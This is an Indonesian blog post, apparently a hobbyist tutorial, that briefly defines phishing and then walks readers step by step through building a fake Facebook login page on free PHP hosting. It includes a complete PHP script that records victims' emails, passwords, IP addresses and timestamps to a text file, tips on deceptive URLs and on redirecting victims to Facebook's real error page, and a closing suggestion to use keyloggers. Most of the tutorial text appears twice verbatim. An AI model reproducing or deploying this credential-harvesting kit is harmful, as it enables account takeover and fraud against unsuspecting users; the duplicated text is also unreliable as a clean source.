Phising adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi peka, seperti kata sandi dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang terpercaya dalam sebuah komunikasi elektronik resmi, seperti posnel atau pesan instan. Istilah phishing dalam bahasa Inggris berasal dari kata fishing (’memancing’), dalam hal ini berarti memancing informasi keuangan dan kata sandi pengguna, Phising juga didefinisikan sebagai sebuah kegiatan memancing pemakai komputer di internet (user) agar mau memberikan informasi data diri pemakai (username) dan kata sandinya (password) pada suatu website yang sudah di-deface. Phising biasanya diarahkan kepada pengguna online banking. Isian data pemakai dan password yang vital yang telah dikirim akhirnya akan menjadi milik penjahat tersebut dan digunakan untuk belanja dengan kartu kredit atau uang rekening milik korbannya.
Pada phising facebook ini, si pelaku hanya berusaha untuk mengambil username dan password saja karena saat mencoba login user dihantarkan pada halaman Address Not Found. Tampilan scam page untuk phising facebook ini bisa di ganti apa aja .
Pertama kali istilah "phising" dipublikasikan oleh American Online Usernet Newgroup pada tanggal 2 Januari 1996 dan mulai menjamur pada tahun 2004. Pada tahun tersebut, perkembangan phising di dunia maya berkembang dengan pesat. Total kerugian akibat phising ditahun 2004 mencapai US$929 juta dengan melibatkan lebih dari 15.000 situs yang menjadi korbannya.
Kebanyakan dari teknik phising adalah melakukan manipulasi sebuah link di dalam email yang akan dikirimkan ke korbannya. Dengan adanya email, praktek phising terbilang mudah hanya dengan melakukan spam pada email dan kemudian menunggu korbannya untuk masuk kedalam tipuannya. Untuk meyakinkan bahwa link yang diberikan asli, biasanya si hacker ini akan membuat sebuah web yang sama persis dengan yang aslinya, perbedaannya URL yang dituju berbeda dengan link yang diberikan. Untuk orang awam yang kurang mengerti tentang web mungkin akan cenderung mudah ditipu, hal ini lah yang harus menjadi waspada untuk Anda agar tidak terkena korban penipuan. Antara link yang diberikan dengan address yang dituju tidak sesuai. Anda hanya tau dan akan menyangka bahwa link tersebut adalah benar karena dikirim melalui email.
%$%!$!#....huuuhhh,,, cape dengan bahasa resmi yg ribet,,,,,di jamin ente juga pasti ngantuk membacanya,,,tapi apalah daya semua demi elmu pengetahuan...hiks...hiks....
--- langkah pertama---
ehmm... pertama kita harus memilih tempat hostingan dulu sebagai tempat bersemayamnya phising ente (contohya: ripway.com, 100mb.com, hostse.com, dll) inget,,pilih yg support PHP, contoh yg gg support php adalah 50web.com krn jika ingin support php kita harus membayar.. (jelas kita memilih yang gratis….hohohoho)
biar jelas, ane kasih contoh untuk ripway.com:
a. pergi ke www.ripway.com ,,lalu register account
b. pada saat memilih username ,, usahakan nama username adalah seperti: admin, login-page, verify ID, dll soalnya username kita akan di jadikan bagian dari link web kita.. misalnya aja kagak lucu klo alamat link yg digunakan untuk phising adalah h1.ripway.com/suanang <c. setelah proses registrasi selesai, segera login dengan username dan password tadi.. lalu pilih "My Files"
---kita beralih pada langkah kedua---
langkah kedua ,,kita cari dulu halaman login forum/situs yg akan kita tiru..
dalam hal ini katakanlah FACEBOOK
a. pergi ke halaman login facebook yg berada di www.facebook.com
b. lihat page source nya dengan klik kanan "view page source" atau klo mozilla bisa juga dengan ctrl U
c. lalu copas eh salah,, copy semua scriptnya ke dalam notepad.. save notepad dengan nama index.html <(oh ya,, tambahan ,kali aj temen2 ad yg lupa,, pada saat save notepad.. ganti save type as "text" menjadi "all type file")
---kita beralih pada langkah ketiga---
langkah ke tiga ,,kita bikin file php nya dulu.. sebagai file yg memrintahkan agar merekam informasi korban yg terkena phising kita..
scriptnya berbeda2 ,,tergantung kebutuhan kita,,
biar cepet kita copy aja seluruh script berikut ke dalam notepad ke dan simpan dengan nama tapukung.php <Quote
$file = "tapukung.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle, " ");
fwrite($handle, "n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "n");
fwrite($handle, " ");
fwrite($handle, "n");
fwrite($handle, "n");
fclose($handle);
echo "";
?>
sedikit penjelasan: (maaf,, klo salah coz ane kagak bisa php sama skali,, hohoho,,,
Quote
$file = "tapukung.txt";
bisa kalian ganti apa saja,, termasuk tapukung.txt :cool: (!!!) ..perintah ini digunakan untuk merekam data pada file txt dimana file txt tsb berguna sebagai tempat perekaman data2 yg sudah terekam oleh web phising kita…(keren abisss…..!!! sapa yg ga ikut muji ..BENJOL.xixixi)
Quote
fwrite($handle, "n");
fwrite($handle, "Email korban: ");
fwrite($handle, "$username");
fwrite($handle, "n");
fwrite($handle, "Password pelaku: ");
fwrite($handle, "$password");
fwrite($handle, "n");
fwrite($handle, "IP PC korban: ");
fwrite($handle, "$ip");
fwrite($handle, "n");
fwrite($handle, "tanggal terekam: ");
fwrite($handle, "$today");
fwrite($handle, "n");
jiah,,, :D nalar sendiri aj dah,,, kira2 perintahnya (yg ditulis bold) untuk nyatet apa aja :D ..jika ada beberapa element yg ga di perlukan ,bisa kalian hapus.. begitu pula jika ingin ada yg dirubah,, temen2 bs merubah seperti apa yg telah saya rubah (bandingkan dgn script aslinya).. karena jika kita membikin phising NFI ,ga mungkin kan nama username nya adalah "email"
Quote
fwrite($handle, " ");
ini adalah pembatas saja.. temen2 bisa ganti dengan:
fwrite($handle, "*************************"); atau...
fwrite($handle, "---------------------------------"); ..terserah..
Quote
hal ini menunjukkan bahwa setelah korban melakukan login ke phising kita, maka akan langsung di direct ke halaman incorrect password FACEBOOK yg ada di alamat https://login.facebook.com/login.php?login_attempt=1" ...jadi disinilah letak kebebasan kita untuk mengarahkan korban kemanapun setelah dia login.. (ohya,, tolong di ingat pada point ini :D )
---kita beralih pada langkah ke empat---
langkah ke empat adalah membuat file txt kosong sebagai tempat penyimpanan rekaman web phising ente tadi.. simpan dengan nama terserah, yg penting sinkron dengan nama file txt yg berada pada script php tadi ..misalnya dalam hal ini adalah tapukung.txt (!!!)
NB: di dalam ripway, kita tidak diperkenankan mengupload file kosong disana. Jadi kita bisa menuliskan bebrapa huruf di dalam file txt tadi, lalu "save"
---kita beralih pada langkah ke satu lagi---
setelah memilih "My Files" tadi ,,segera buat subfolder di sana , terserah mau bikin berapa subfolder terserah, atau bahkan tidak membuat subfolder pun trrserah.. contoh link nya adalah: h1.ripway.com/admin/facebook/login=pad90.0d=9635d65a06ee7ccdf5a543a6c443f2ee
terserah mau bikin panjang atau pendek terserah,, ada baiknya ada buruknya jg,, klo pendek tidak terlihat sbg link yg aneh (biasanya digunkan pada chat, message,dll), klo panjang bisa di kira sebagai cookies (biasanya digunakan via e-mail, atau PM forum)
setelah membuat subfolder, segera upload file tapukung.txt tadi (!!!)
---kita beralih pada langkah ketiga lagi---
setelah membuat file tapukung.php ..kalau nama file txt anda bukan tapukung.txt ,,maka gantilah script php tadi pada elemen berikut:
Quote
$file = "tapukung.txt"; <<$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
dst..
dst..
setelah itu segera upload seperti cara mengupload file txt tadi..
NB: usahakan mengupload pada satu folder yg sama ,,meskipun hal ini tidak berpengaruh klo kita menyesuaikan script2 yg ada dengan link folder yg tepat..
jadi agar tidak merepotkan, lebih baik upload di satu folder yang sama.
---kita beralih pada langkah ke dua lagi---
buka file index.html tadi dengan "open with notepad"
segera cari method="post" gunakan ctrl F untuk mempercepat pencarian (anda akan menjumpai beberapa method="post" tapi pilih yang terdapat pada kolom login)..setelah ketemu lalu ganti dengan method="get" ..setelah itu cari action= (cari yg paling mengarah pada kolom login) ..
setelah itu save file index.html nya, lalu upload seperti dua file yg tadi (php dan txt)..
---WEB PHISING ENTE SEKARANG SUDAH JADI---
maaf jika terlalu panjang, cOz klo kagak di jelasin secara mendetail takutnya ‘ntar malah pada kagak ngerti kenapa harus begitu, kenapa harus begini.. (Sok jadi professor,,, hehehe)
cara singkat bikin phising sih cuman begini doank :D
1. bikin web
2. bikin fake login nya (halaman login palsu)
3. bikin script php buat merekam data nya
4. bikin file txt sbg tempat perekaman
5. upload file 2, 3 dan 4 (BERES dah) :D
TEKNIK PENYEBARAN
bikin phising nya sih mudah,, masalahnya bagaimana cara memancing korban agar mau login ke phising kita itu yg susah …hohohoo (cara penyebarannya kapan2…usaha dong…jangan nyari yg instant truz…kata na mo jadi hacker,,,,hehehe)
SAATNYA PANEN PASSWORD
Setelah menipu korban dan korban sudah login ke facebook ente, maka bergembira, rayakan dengan bakar sate, bakar orang ato apa kek, terserah :D
klo pesta nya udah usai,, sekarang coba lihat di file txt tadi.. JREEEENNGGG... email, pass, korban terterekam lengkap dengan IP nya :dance:
langsung saja coba login :) ,,tp jangan kaget klo password nya incorrect mulu :| ?
kenapa??? masih inget kan sama kata2 ane yg ini :o
Quote
(ohya,, tolong di ingat pada point ini :D )
hal ini juga berlaku jika anda membuat phising NFI yg merupakan forum berbasis SMF.. contoh jika anda membuat phising NFI maka hasil yg anda dapat adalah:
Quote
username: like_bebeck :crazy:
password=
hash_password=da39a3ee5e6b4b0d3255bfef95601890afd80709
kenapa bisa begini,,, kenapa bisa begitu????
Simpan pertanyaan ente,,, kita sambung kapan2….hohoho
(biar ente-ente pade sering nengok’n blog ane…..hehehe
NB:
1.Ga pengen ribet bikin PHISING,,,tp ente pengen ngeHack password orang….guna’n aja aplikasi “KEYLOGGER” ….(suhu na dalam ngecatet apa pun yg d ketik oleh keyboard computer)
2.artikel ne di buat hanya untuk elmu pengetahun semata… penyalahgunaan tidak menjadi tanggung jawab Tapukung ^_^ Corp. selaku pemilik blog. (tanggung dosa na sendiri...hehehe)
3.artikel ne bersipat sementara,, nanti ta' edit lagi...
Pada phising facebook ini, si pelaku hanya berusaha untuk mengambil username dan password saja karena saat mencoba login user dihantarkan pada halaman Address Not Found. Tampilan scam page untuk phising facebook ini bisa di ganti apa aja .
Pertama kali istilah "phising" dipublikasikan oleh American Online Usernet Newgroup pada tanggal 2 Januari 1996 dan mulai menjamur pada tahun 2004. Pada tahun tersebut, perkembangan phising di dunia maya berkembang dengan pesat. Total kerugian akibat phising ditahun 2004 mencapai US$929 juta dengan melibatkan lebih dari 15.000 situs yang menjadi korbannya.
Kebanyakan dari teknik phising adalah melakukan manipulasi sebuah link di dalam email yang akan dikirimkan ke korbannya. Dengan adanya email, praktek phising terbilang mudah hanya dengan melakukan spam pada email dan kemudian menunggu korbannya untuk masuk kedalam tipuannya. Untuk meyakinkan bahwa link yang diberikan asli, biasanya si hacker ini akan membuat sebuah web yang sama persis dengan yang aslinya, perbedaannya URL yang dituju berbeda dengan link yang diberikan. Untuk orang awam yang kurang mengerti tentang web mungkin akan cenderung mudah ditipu, hal ini lah yang harus menjadi waspada untuk Anda agar tidak terkena korban penipuan. Antara link yang diberikan dengan address yang dituju tidak sesuai. Anda hanya tau dan akan menyangka bahwa link tersebut adalah benar karena dikirim melalui email.
%$%!$!#....huuuhhh,,, cape dengan bahasa resmi yg ribet,,,,,di jamin ente juga pasti ngantuk membacanya,,,tapi apalah daya semua demi elmu pengetahuan...hiks...hiks....
--- langkah pertama---
ehmm... pertama kita harus memilih tempat hostingan dulu sebagai tempat bersemayamnya phising ente (contohya: ripway.com, 100mb.com, hostse.com, dll) inget,,pilih yg support PHP, contoh yg gg support php adalah 50web.com krn jika ingin support php kita harus membayar.. (jelas kita memilih yang gratis….hohohoho)
biar jelas, ane kasih contoh untuk ripway.com:
a. pergi ke www.ripway.com ,,lalu register account
b. pada saat memilih username ,, usahakan nama username adalah seperti: admin, login-page, verify ID, dll soalnya username kita akan di jadikan bagian dari link web kita.. misalnya aja kagak lucu klo alamat link yg digunakan untuk phising adalah h1.ripway.com/suanang <c. setelah proses registrasi selesai, segera login dengan username dan password tadi.. lalu pilih "My Files"
---kita beralih pada langkah kedua---
langkah kedua ,,kita cari dulu halaman login forum/situs yg akan kita tiru..
dalam hal ini katakanlah FACEBOOK
a. pergi ke halaman login facebook yg berada di www.facebook.com
b. lihat page source nya dengan klik kanan "view page source" atau klo mozilla bisa juga dengan ctrl U
c. lalu copas eh salah,, copy semua scriptnya ke dalam notepad.. save notepad dengan nama index.html <(oh ya,, tambahan ,kali aj temen2 ad yg lupa,, pada saat save notepad.. ganti save type as "text" menjadi "all type file")
---kita beralih pada langkah ketiga---
langkah ke tiga ,,kita bikin file php nya dulu.. sebagai file yg memrintahkan agar merekam informasi korban yg terkena phising kita..
scriptnya berbeda2 ,,tergantung kebutuhan kita,,
biar cepet kita copy aja seluruh script berikut ke dalam notepad ke dan simpan dengan nama tapukung.php <Quote
$file = "tapukung.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle, " ");
fwrite($handle, "n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "n");
fwrite($handle, " ");
fwrite($handle, "n");
fwrite($handle, "n");
fclose($handle);
echo "";
?>
sedikit penjelasan: (maaf,, klo salah coz ane kagak bisa php sama skali,, hohoho,,,
Quote
$file = "tapukung.txt";
bisa kalian ganti apa saja,, termasuk tapukung.txt :cool: (!!!) ..perintah ini digunakan untuk merekam data pada file txt dimana file txt tsb berguna sebagai tempat perekaman data2 yg sudah terekam oleh web phising kita…(keren abisss…..!!! sapa yg ga ikut muji ..BENJOL.xixixi)
Quote
fwrite($handle, "n");
fwrite($handle, "Email korban: ");
fwrite($handle, "$username");
fwrite($handle, "n");
fwrite($handle, "Password pelaku: ");
fwrite($handle, "$password");
fwrite($handle, "n");
fwrite($handle, "IP PC korban: ");
fwrite($handle, "$ip");
fwrite($handle, "n");
fwrite($handle, "tanggal terekam: ");
fwrite($handle, "$today");
fwrite($handle, "n");
jiah,,, :D nalar sendiri aj dah,,, kira2 perintahnya (yg ditulis bold) untuk nyatet apa aja :D ..jika ada beberapa element yg ga di perlukan ,bisa kalian hapus.. begitu pula jika ingin ada yg dirubah,, temen2 bs merubah seperti apa yg telah saya rubah (bandingkan dgn script aslinya).. karena jika kita membikin phising NFI ,ga mungkin kan nama username nya adalah "email"
Quote
fwrite($handle, " ");
ini adalah pembatas saja.. temen2 bisa ganti dengan:
fwrite($handle, "*************************"); atau...
fwrite($handle, "---------------------------------"); ..terserah..
Quote
hal ini menunjukkan bahwa setelah korban melakukan login ke phising kita, maka akan langsung di direct ke halaman incorrect password FACEBOOK yg ada di alamat https://login.facebook.com/login.php?login_attempt=1" ...jadi disinilah letak kebebasan kita untuk mengarahkan korban kemanapun setelah dia login.. (ohya,, tolong di ingat pada point ini :D )
---kita beralih pada langkah ke empat---
langkah ke empat adalah membuat file txt kosong sebagai tempat penyimpanan rekaman web phising ente tadi.. simpan dengan nama terserah, yg penting sinkron dengan nama file txt yg berada pada script php tadi ..misalnya dalam hal ini adalah tapukung.txt (!!!)
NB: di dalam ripway, kita tidak diperkenankan mengupload file kosong disana. Jadi kita bisa menuliskan bebrapa huruf di dalam file txt tadi, lalu "save"
---kita beralih pada langkah ke satu lagi---
setelah memilih "My Files" tadi ,,segera buat subfolder di sana , terserah mau bikin berapa subfolder terserah, atau bahkan tidak membuat subfolder pun trrserah.. contoh link nya adalah: h1.ripway.com/admin/facebook/login=pad90.0d=9635d65a06ee7ccdf5a543a6c443f2ee
terserah mau bikin panjang atau pendek terserah,, ada baiknya ada buruknya jg,, klo pendek tidak terlihat sbg link yg aneh (biasanya digunkan pada chat, message,dll), klo panjang bisa di kira sebagai cookies (biasanya digunakan via e-mail, atau PM forum)
setelah membuat subfolder, segera upload file tapukung.txt tadi (!!!)
---kita beralih pada langkah ketiga lagi---
setelah membuat file tapukung.php ..kalau nama file txt anda bukan tapukung.txt ,,maka gantilah script php tadi pada elemen berikut:
Quote
$file = "tapukung.txt"; <<$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
dst..
dst..
setelah itu segera upload seperti cara mengupload file txt tadi..
NB: usahakan mengupload pada satu folder yg sama ,,meskipun hal ini tidak berpengaruh klo kita menyesuaikan script2 yg ada dengan link folder yg tepat..
jadi agar tidak merepotkan, lebih baik upload di satu folder yang sama.
---kita beralih pada langkah ke dua lagi---
buka file index.html tadi dengan "open with notepad"
segera cari method="post" gunakan ctrl F untuk mempercepat pencarian (anda akan menjumpai beberapa method="post" tapi pilih yang terdapat pada kolom login)..setelah ketemu lalu ganti dengan method="get" ..setelah itu cari action= (cari yg paling mengarah pada kolom login) ..
setelah itu save file index.html nya, lalu upload seperti dua file yg tadi (php dan txt)..
---WEB PHISING ENTE SEKARANG SUDAH JADI---
maaf jika terlalu panjang, cOz klo kagak di jelasin secara mendetail takutnya ‘ntar malah pada kagak ngerti kenapa harus begitu, kenapa harus begini.. (Sok jadi professor,,, hehehe)
cara singkat bikin phising sih cuman begini doank :D
1. bikin web
2. bikin fake login nya (halaman login palsu)
3. bikin script php buat merekam data nya
4. bikin file txt sbg tempat perekaman
5. upload file 2, 3 dan 4 (BERES dah) :D
TEKNIK PENYEBARAN
bikin phising nya sih mudah,, masalahnya bagaimana cara memancing korban agar mau login ke phising kita itu yg susah …hohohoo (cara penyebarannya kapan2…usaha dong…jangan nyari yg instant truz…kata na mo jadi hacker,,,,hehehe)
SAATNYA PANEN PASSWORD
Setelah menipu korban dan korban sudah login ke facebook ente, maka bergembira, rayakan dengan bakar sate, bakar orang ato apa kek, terserah :D
klo pesta nya udah usai,, sekarang coba lihat di file txt tadi.. JREEEENNGGG... email, pass, korban terterekam lengkap dengan IP nya :dance:
langsung saja coba login :) ,,tp jangan kaget klo password nya incorrect mulu :| ?
kenapa??? masih inget kan sama kata2 ane yg ini :o
Quote
(ohya,, tolong di ingat pada point ini :D )
hal ini juga berlaku jika anda membuat phising NFI yg merupakan forum berbasis SMF.. contoh jika anda membuat phising NFI maka hasil yg anda dapat adalah:
Quote
username: like_bebeck :crazy:
password=
hash_password=da39a3ee5e6b4b0d3255bfef95601890afd80709
kenapa bisa begini,,, kenapa bisa begitu????
Simpan pertanyaan ente,,, kita sambung kapan2….hohoho
(biar ente-ente pade sering nengok’n blog ane…..hehehe
NB:
1.Ga pengen ribet bikin PHISING,,,tp ente pengen ngeHack password orang….guna’n aja aplikasi “KEYLOGGER” ….(suhu na dalam ngecatet apa pun yg d ketik oleh keyboard computer)
2.artikel ne di buat hanya untuk elmu pengetahun semata… penyalahgunaan tidak menjadi tanggung jawab Tapukung ^_^ Corp. selaku pemilik blog. (tanggung dosa na sendiri...hehehe)
3.artikel ne bersipat sementara,, nanti ta' edit lagi...
No comments:
Post a Comment